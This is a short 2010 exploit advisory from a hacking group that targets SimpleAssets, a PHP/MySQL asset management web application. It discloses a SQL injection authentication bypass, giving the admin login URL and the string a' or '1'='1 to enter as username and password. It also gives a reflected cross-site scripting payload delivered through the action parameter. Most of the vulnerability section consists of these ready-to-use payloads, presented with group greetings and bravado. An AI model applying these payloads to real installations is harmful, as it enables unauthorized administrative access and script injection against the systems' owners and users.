1 ########################################## 1
0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:SimpleAssets Authentication Bypass & XSS Vulnerability
Vendor url:http://simpleassets.sourceforge.net/
Version:n/a
Price:n/a
Published: 2010-06-21
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:
SimpleAssets is a web based asset management system to track assets, employees, software licenses, ip addresses and asset sign in and sign out. Supports importing from existing DB's. An online demo is available to try before you download. (PHP/MySQL) Code: PHP 4.0
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Vulnerability:
*Authentication Bypass found
The Provided Script as Sqli Vulnerability in Admin Login page
DEMO URL : http://server/simpleassets/index.php?action=login&lastaction=&lastkey=&loginout=2
Use the string a' or '1'='1 for Username and Password to gain access.
*XSS Vulnerability
Parameter: '"--><script>alert(0x000872)</script>
Demo URL:-http://server/simpleassets/index.php?action=[xss]
# 0day n0 m0re #
# L0rd CrusAd3r #
